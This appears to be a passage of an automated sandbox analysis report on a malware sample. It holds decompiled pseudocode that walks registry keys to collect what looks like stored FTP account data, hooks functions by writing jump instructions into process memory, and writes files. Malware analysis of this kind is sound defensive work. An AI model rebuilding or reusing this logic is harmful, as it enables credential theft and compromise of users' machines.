				intOrPtr _v60;
				char _v64;
				char _v84;
				char _v104;
				char _v124;
				char _v148;
				char _v188;
				short _v276;
				short _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t69;
				void* _t71;
				intOrPtr _t75;
				intOrPtr _t76;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t86;
				intOrPtr _t100;
				int _t112;
				void* _t119;
				void* _t122;
				int _t128;
				void* _t132;
				void* _t140;
				void* _t143;
				void* _t144;

				_t127 = __edx;
				_t125 = __ecx;
				_t128 = 0;
				E004104CB( &_v32,  &_v32, 0, 8);
				_t69 = HeapAlloc( *0x41bc68, 8, 0xc20);
				_v24 = _t69;
				if(_t69 == 0) {
					L22:
					_t164 = _v28 - _t128;
					if(_v28 > _t128) {
						_t134 =  &_v64;
						_t71 = 0x66;
						E0040F369(_t71,  &_v64);
						E0040D929(_t134, _v32, _t127, _t164, _t134);
					}
					return E00410418(_v32);
				} else {
					_t75 = _t69 + 0x1fe;
					_v40 = _t75;
					_t76 = _t75 + 0x1fe;
					_v36 = _t76;
					_v44 = _t76 + 0x1fe;
					_t78 = 0x61;
					_v60 = 0x80000001;
					_v56 = 0x80000002;
					E0040F369(_t78,  &_v276);
					_t80 = 0x62;
					E0040F369(_t80,  &_v124);
					_t82 = 0x63;
					E0040F369(_t82,  &_v148);
					_t84 = 0x64;
					E0040F369(_t84,  &_v104);
					_t86 = 0x65;
					E0040F369(_t86,  &_v84);
					_v16 = 0;
					do {
						if(RegOpenKeyExW( *(_t143 + _v16 * 4 - 0x38),  &_v276, _t128, 8,  &_v8) != 0) {
							goto L20;
						}
						_v20 = _t128;
						_v12 = 0x104;
						if(RegEnumKeyExW(_v8, _t128,  &_v796,  &_v12, _t128, _t128, _t128, _t128) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v12 = 0x104;
						if(RegEnumKeyExW(_v8, _v20,  &_v796,  &_v12, 0, 0, 0, 0) == 0) {
							L4:
							_v20 = _v20 + 1;
							_t100 = E004143B6(_v8, 0xff, _t125, _v24,  &_v796,  &_v124);
							_v48 = _t100;
							if(_t100 != 0xffffffff && _t100 > 0) {
								_t140 = E004143B6(_v8, 0xff, _t125, _v40,  &_v796,  &_v104);
								if(_t140 != 0xffffffff && _t140 > 0) {
									_t131 = _v36;
									_t112 = E004143B6(_v8, 0xff, _t125, _v36,  &_v796,  &_v84);
									_v12 = _t112;
									if(_t112 != 0xffffffff && _t112 > 0 && E00408E76(_t127, _t131, _t140 + _v48) > 0) {
										_t132 = E0041442C(_v8, _t125,  &_v796,  &_v148);
										if(_t132 < 1 || _t132 > 0xffff) {
											_t132 = 0x15;
										}
										_t142 =  &_v188;
										_t119 = 0x2c;
										E0040F369(_t119,  &_v188);
										_push(_t132);
										_push(_v24);
										_t133 = _v44;
										_push(_v36);
										_push(_v40);
										_t127 = 0x311;
										_t122 = E004111A5(_t142, 0x311, _v44, _t142);
										_t144 = _t144 + 0x14;
										if(_t122 > 0) {
											_t125 =  &_v32;
											if(E00410818(_t122,  &_v32, _t133) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t128 = 0;
							goto L19;
						}
						L20:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00410418(_v24);
					goto L22;
				}
			}













































            0x00408f31
            0x00408f31
            0x00408f3f
            0x00408f46
            0x00408f58
            0x00408f5e
            0x00408f63
            0x0040915c
            0x0040915c
            0x0040915f
            0x00409163
            0x00409166
            0x00409167
            0x00409172
            0x00409172
            0x00409183
            0x00408f69
            0x00408f69
            0x00408f6e
            0x00408f71
            0x00408f76
            0x00408f80
            0x00408f89
            0x00408f8a
            0x00408f91
            0x00408f98
            0x00408fa2
            0x00408fa3
            0x00408fb0
            0x00408fb1
            0x00408fbb
            0x00408fbc
            0x00408fc6
            0x00408fc7
            0x00408fcc
            0x00408fd4
            0x00408ff1
            0x00000000
            0x00000000
            0x0040900a
            0x0040900d
            0x0040901c
            0x0040913e
            0x00409141
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00409110
            0x00409124
            0x00409136
            0x00409022
            0x00409025
            0x00409036
            0x0040903b
            0x00409041
            0x00409065
            0x0040906a
            0x00409078
            0x00409089
            0x0040908e
            0x00409094
            0x004090bf
            0x004090c4
            0x004090d0
            0x004090d0
            0x004090d3
            0x004090d9
            0x004090da
            0x004090df
            0x004090e0
            0x004090e3
            0x004090e6
            0x004090eb
            0x004090ee
            0x004090f4
            0x004090f9
            0x004090fe
            0x00409101
            0x0040910b
            0x0040910d
            0x0040910d
            0x0040910b
            0x004090fe
            0x00409094
            0x0040906a
            0x00000000
            0x0040913c
            0x0040913c
            0x00000000
            0x0040913c
            0x00409147
            0x00409147
            0x0040914a
            0x00409157
            0x00000000
            0x00409157

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008,?,?,00000001), ref: 00408F58
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,?,00000001), ref: 00408FE9
            • RegEnumKeyExW.ADVAPI32 ref: 00409014
            • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00409141
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegEnumKeyExW.ADVAPI32 ref: 0040912E
              • Part of subcall function 0041442C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040BFB8,?,?), ref: 00414444
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 7d5d053bee7caadb2400416d617ff1a795b1669c455758070fcdad256cc20b5e
            • Instruction ID: 80f34b2e680f874422ff8504da72e961bda3c1f56b0e1d22a48561dd2b74b2da
            • Opcode Fuzzy Hash: 7d5d053bee7caadb2400416d617ff1a795b1669c455758070fcdad256cc20b5e
            • Instruction Fuzzy Hash: 58618D71E00219ABDB20DBA5CD45AEEB7B9EB48310F100476F910F7292D7389E858B98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004094E0 Relevance: 7.7, APIs: 5, Instructions: 184registrymemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E004094E0(char* __ecx) {
				void* _v8;
				int _v12;
				void* _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v100;
				char _v140;
				short _v204;
				short _v724;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				intOrPtr _t60;
				char* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				void* _t71;
				void* _t78;
				int _t89;
				int _t97;
				int _t101;
				void* _t107;
				void* _t110;
				int* _t116;
				char* _t119;
				void* _t120;
				void* _t129;

				_t113 = __ecx;
				_t116 = 0;
				E004104CB( &_v28,  &_v28, 0, 8);
				_t59 = HeapAlloc( *0x41bc68, 8, 0xc20);
				_v16 = _t59;
				if(_t59 == 0) {
					return _t59;
				}
				_t60 = _t59 + 0x1fe;
				_v32 = _t60;
				_t61 = _t60 + 0x1fe;
				_v36 = _t61;
				_v40 = _t61 + 0x1fe;
				_t63 = 0x6e;
				E0040F369(_t63,  &_v204);
				_t65 = 0x6f;
				E0040F369(_t65,  &_v72);
				_t67 = 0x70;
				E0040F369(_t67,  &_v84);
				_t69 = 0x71;
				E0040F369(_t69,  &_v60);
				_t71 = 0x72;
				E0040F369(_t71,  &_v48);
				if(RegOpenKeyExW(0x80000001,  &_v204, 0, 8,  &_v8) != 0) {
					L20:
					E00410418(_v16);
					_t147 = _v24 - _t116;
					if(_v24 > _t116) {
						_t127 =  &_v100;
						_t78 = 0x73;
						E0040F369(_t78,  &_v100);
						E0040D929(_t127, _v28, 0x311, _t147, _t127);
					}
					return E00410418(_v28);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v724,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_v20 = _v20 + 1;
						_t89 = E004143B6(_v8, 0xff, _t113, _v16,  &_v724,  &_v72);
						_v12 = _t89;
						if(_t89 != 0xffffffff && _t89 > 0) {
							_t97 = E004143B6(_v8, 0xff, _t113, _v32,  &_v724,  &_v60);
							_v12 = _t97;
							if(_t97 != 0xffffffff && _t97 > 0) {
								_t119 = _v36;
								_t101 = E004143B6(_v8, 0xff, _t113, _t119,  &_v724,  &_v48);
								_v12 = _t101;
								if(_t101 != 0xffffffff && _t101 > 0) {
									_t113 = _t119;
									if(E00411098(_t119) > 0) {
										_t120 = E0041442C(_v8, _t113,  &_v724,  &_v84);
										if(_t120 < 1 || _t120 > 0xffff) {
											_t120 = 0x15;
										}
										_t128 =  &_v140;
										_t107 = 0x2c;
										E0040F369(_t107,  &_v140);
										_push(_t120);
										_push(_v16);
										_t121 = _v40;
										_push(_v36);
										_push(_v32);
										_t110 = E004111A5(_t128, 0x311, _v40, _t128);
										_t129 = _t129 + 0x14;
										if(_t110 > 0) {
											_t113 =  &_v28;
											if(E00410818(_t110,  &_v28, _t121) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v724,  &_v12, 0, 0, 0, 0) == 0);
					_t116 = 0;
					goto L19;
				}
			}









































            0x004094e0
            0x004094ee
            0x004094f5
            0x00409507
            0x0040950d
            0x00409512
            0x00409709
            0x00409709
            0x00409518
            0x0040951d
            0x00409520
            0x00409525
            0x0040952f
            0x00409538
            0x00409539
            0x00409543
            0x00409544
            0x0040954e
            0x0040954f
            0x00409559
            0x0040955a
            0x00409564
            0x00409565
            0x00409585
            0x004096da
            0x004096dd
            0x004096e2
            0x004096e5
            0x004096e9
            0x004096ec
            0x004096ed
            0x004096f8
            0x004096f8
            0x00000000
            0x00409700
            0x0040959e
            0x004095a1
            0x004095b0
            0x004096d1
            0x004096d4
            0x00000000
            0x004095b6
            0x004095bb
            0x004095be
            0x004095cf
            0x004095d4
            0x004095da
            0x004095f9
            0x004095fe
            0x00409604
            0x00409612
            0x00409623
            0x00409628
            0x0040962e
            0x00409634
            0x0040963d
            0x00409652
            0x00409657
            0x00409663
            0x00409663
            0x00409666
            0x0040966c
            0x0040966d
            0x00409672
            0x00409673
            0x00409676
            0x00409679
            0x0040967e
            0x00409687
            0x0040968c
            0x00409691
            0x00409694
            0x0040969e
            0x004096a0
            0x004096a0
            0x0040969e
            0x00409691
            0x0040963d
            0x0040962e
            0x00409604
            0x004096b7
            0x004096c7
            0x004096cf
            0x00000000
            0x004096cf

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008,?,?,00000001), ref: 00409507
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,?,00000001), ref: 0040957D
            • RegEnumKeyExW.ADVAPI32 ref: 004095A8
            • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004096D4
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegEnumKeyExW.ADVAPI32 ref: 004096C1
              • Part of subcall function 0041442C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040BFB8,?,?), ref: 00414444
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 7f53d273c2ae39471f4597f2bb1220923d8686482de57e751d13e8ab85c86284
            • Instruction ID: 6af2541e65c2cf487d30ed341f0b89546ed1ed67914672326d2ba30f4f1cae26
            • Opcode Fuzzy Hash: 7f53d273c2ae39471f4597f2bb1220923d8686482de57e751d13e8ab85c86284
            • Instruction Fuzzy Hash: BC517A72D00109AADB20EBA5CD45FEEBBB8EB44310F10457AFA04F3291D7799E858B94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00416338 Relevance: 7.6, APIs: 5, Instructions: 111fileCOMMON
            Download Yara Rule
            C-Code - Quality: 96%
            			E00416338(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0041586F(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0041581F( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0041581F( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0041581F( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}





















            0x00416338
            0x00416338
            0x00416338
            0x00416340
            0x00416355
            0x00416359
            0x0041635f
            0x00416364
            0x0041636b
            0x00416374
            0x00416377
            0x0041637d
            0x004163a4
            0x004163a6
            0x004163ac
            0x0041637f
            0x00416381
            0x00416449
            0x00416449
            0x0041644d
            0x0041644d
            0x0041644d
            0x00416456
            0x0041645a
            0x00416387
            0x00416394
            0x00416397
            0x004163a2
            0x004163b6
            0x004163b6
            0x004163b9
            0x00000000
            0x00000000
            0x004163bf
            0x004163c3
            0x00416423
            0x0041642c
            0x00416431
            0x00416433
            0x00000000
            0x00416439
            0x0041643b
            0x00416441
            0x00416443
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00416443
            0x004163c5
            0x004163c8
            0x004163d4
            0x004163d7
            0x004163da
            0x004163dc
            0x004163df
            0x004163e2
            0x00416421
            0x00416421
            0x00416421
            0x00000000
            0x004163e4
            0x004163e4
            0x004163eb
            0x004163eb
            0x004163f0
            0x00000000
            0x004163f2
            0x004163f8
            0x004163fd
            0x004163ff
            0x00000000
            0x00416401
            0x0041640f
            0x00416412
            0x00416415
            0x0041641b
            0x0041641d
            0x004163b4
            0x004163b4
            0x00000000
            0x0041641f
            0x00000000
            0x0041641f
            0x0041641d
            0x004163ff
            0x004163e6
            0x004163e6
            0x004163e9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004163e9
            0x004163e4
            0x004163e2
            0x00000000
            0x004163c3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004163a2
            0x00416381
            0x0041637d
            0x0041645f
            0x00416465

            APIs
            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00416359
              • Part of subcall function 0041586F: GetFileSizeEx.KERNEL32(pcA,pcA,?,?,?,00416370,00000000), ref: 0041587B
            • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041639A
            • CloseHandle.KERNEL32(?,00000000), ref: 004163A6
            • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00416415
            • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041643B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Read$CloseCreateHandleSize
            • String ID:
            • API String ID: 1850650832-0
            • Opcode ID: b71dba6a67df98233a78326632f389910b90784b07bd2d54eb997625e6b18ba2
            • Instruction ID: 864394138077e883aa55fef53730b6229bcd19b39a27a9c94eda86169fad357c
            • Opcode Fuzzy Hash: b71dba6a67df98233a78326632f389910b90784b07bd2d54eb997625e6b18ba2
            • Instruction Fuzzy Hash: AA41A534900208AEDF209F55CC85BEFBFB9EF84314F15411EFAA5E22A0D7398581DB69
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414D4A Relevance: 7.6, APIs: 5, Instructions: 105injectionCOMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E00414D4A(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t57;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t63;
				long _t65;
				DWORD* _t66;
				void* _t68;

				_t61 = __edx;
				_t60 = __ecx;
				_t57 = __eax;
				_t66 = 0;
				_v12 = 0;
				if(E00414D05(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E004104CB( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t63 =  &_v48;
						_push(0);
						_push(_t63);
						while(1) {
							_t47 = E00416BD0(_t57, _t60, _t61, _t63, _t66);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t66 = _t66 + _t47;
							if(_t66 > 0x1e) {
								L16:
								goto L17;
							}
							_t60 =  *_t63;
							if(_t60 == 0xe9 || _t60 == 0xe8) {
								if(_t47 == 5) {
									 *((intOrPtr*)(_t63 + 1)) =  *((intOrPtr*)(_t63 + 1)) + _a4 - _a8;
								}
							}
							_push(0);
							if(_t66 >= 5) {
								_t17 = _t66 + 5; // 0x5
								_t65 = _t17;
								 *((intOrPtr*)(_t68 + _t66 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t68 + _t66 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t65, ??) != 0) {
									_v48 = 0xe9;
									_v47 = _t57 - _a4 - 5;
									if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
										_v12 = _t65;
									}
								}
								goto L16;
							}
							_t63 = _t68 + _t66 - 0x2c;
							_push(_t63);
						}
						goto L16;
					}
				}
			}



















            0x00414d4a
            0x00414d4a
            0x00414d52
            0x00414d57
            0x00414d59
            0x00414d64
            0x00414e56
            0x00414e5c
            0x00414d85
            0x00414d8d
            0x00414da6
            0x00414e42
            0x00414e50
            0x00000000
            0x00414dac
            0x00414dad
            0x00414db0
            0x00414db3
            0x00414de7
            0x00414de7
            0x00414def
            0x00000000
            0x00000000
            0x00414db6
            0x00414dbb
            0x00414e41
            0x00000000
            0x00414e41
            0x00414dc1
            0x00414dc6
            0x00414dd0
            0x00414dd8
            0x00414dd8
            0x00414dd0
            0x00414ddb
            0x00414de0
            0x00414df9
            0x00414df9
            0x00414dff
            0x00414e0b
            0x00414e1c
            0x00414e31
            0x00414e35
            0x00414e3c
            0x00414e3e
            0x00414e3e
            0x00414e3c
            0x00000000
            0x00414e1c
            0x00414de2
            0x00414de6
            0x00414de6
            0x00000000
            0x00414df1
            0x00414da6

            APIs
              • Part of subcall function 00414D05: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,-00000008,?,?,?,?,00406230,00000000,00000000,00000012,00403A56), ref: 00414D1A
            • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,00000000,-00000008,00000012,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414D77
            • ReadProcessMemory.KERNEL32(000000FF,00000000,00000023,0000001E,00000000,00000023,00000090,00000023,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414D9E
            • WriteProcessMemory.KERNEL32(000000FF,00000000,00000000,00000005,00000000,00000000,00000000), ref: 00414E18
            • WriteProcessMemory.KERNEL32(000000FF,00000000,000000E9,00000005,00000000), ref: 00414E38
            • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000000,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414E50
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
            • String ID:
            • API String ID: 390532180-0
            • Opcode ID: ac64923e744eb98b30f763b884ff3ed8716f7cb367a1f2d0c8383c91dd5100cd
            • Instruction ID: 80b260e5833558353360dcaed46993bda44392057d52ada0c07c212446e190be
            • Opcode Fuzzy Hash: ac64923e744eb98b30f763b884ff3ed8716f7cb367a1f2d0c8383c91dd5100cd
            • Instruction Fuzzy Hash: B7318132900218BADF10DEB8DC44EDE7BA8AB49770F148316FA25EA1D0C634D6808B68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040A5CD Relevance: 7.6, APIs: 5, Instructions: 85fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040A5CD(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0xf;
				_v16 = __edx;
				_t44 = __ecx;
				E0040F369(_t18,  &_v32);
				if(E00415D45(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x14;
				_t39 = 0;
				E0040F333(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E004158D7( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00411086(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}


















            0x0040a5da
            0x0040a5dd
            0x0040a5de
            0x0040a5e1
            0x0040a5e3
            0x0040a5f9
            0x0040a6af
            0x0040a6b3
            0x0040a6b3
            0x0040a618
            0x0040a61e
            0x0040a624
            0x00000000
            0x00000000
            0x0040a633
            0x0040a634
            0x0040a636
            0x0040a65a
            0x0040a68b
            0x0040a68e
            0x0040a697
            0x0040a6a0
            0x0040a6a9
            0x0040a6a9
            0x00000000
            0x0040a661
            0x0040a661
            0x0040a666
            0x0040a685
            0x0040a685
            0x00000000
            0x0040a685
            0x0040a66f
            0x0040a67e
            0x0040a689
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040a67e

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040A618
            • WriteFile.KERNEL32(0040A5B5,?,00000146,?,00000000,00000000), ref: 0040A656
            • WriteFile.KERNEL32(0040A5B5,?,00000000,?,00000000), ref: 0040A67A
            • FlushFileBuffers.KERNEL32(0040A5B5), ref: 0040A68E
            • CloseHandle.KERNEL32(0040A5B5), ref: 0040A697
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
            • String ID:
            • API String ID: 2459967240-0
            • Opcode ID: 87c6b3d0f8b068524891429315e5fa5b6c38a3f65c7d543555488c267bcffd37
            • Instruction ID: 33e7084092379ecc7a200681c1635959d9c1ad929ce949161d3a3e6c324dfc83
            • Opcode Fuzzy Hash: 87c6b3d0f8b068524891429315e5fa5b6c38a3f65c7d543555488c267bcffd37
            • Instruction Fuzzy Hash: E721DC32940218BACF209BA1CD45FEF7BBCAF44350F144577A980F3190DB3A8A55CB66
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404811 Relevance: 7.6, APIs: 5, Instructions: 71synchronizationthreadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404811(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E00403D00(_t40, _t50, 0x19367401, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00403CC5(0xff220823,  &_v204, 0);
					_t43 =  &_v724;
					E00403ED1(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00411098(_t43);
					_t24 = E00403E39();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E00413A4E(_v12);
						__eflags = 0;
						return 0;
					}
					E0040F369(0xa4,  &_v104);
					_t28 = WaitForSingleObject( *0x41a758, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E004144D2(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x41a758, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

















            0x00404811
            0x00404811
            0x00404823
            0x00404830
            0x00404835
            0x0040483a
            0x00404851
            0x00404858
            0x0040485e
            0x00404866
            0x0040486c
            0x00404873
            0x00404876
            0x0040487b
            0x0040487d
            0x004048de
            0x004048e1
            0x004048e6
            0x00000000
            0x004048e8
            0x00404889
            0x004048a0
            0x004048a5
            0x004048a7
            0x004048dc
            0x00000000
            0x004048dd
            0x004048b0
            0x004048b3
            0x004048ca
            0x004048d6
            0x004048d8
            0x004048d8
            0x00000000
            0x004048b3
            0x00000000

            APIs
            • GetCurrentThread.KERNEL32 ref: 0040481C
            • SetThreadPriority.KERNEL32(00000000), ref: 00404823
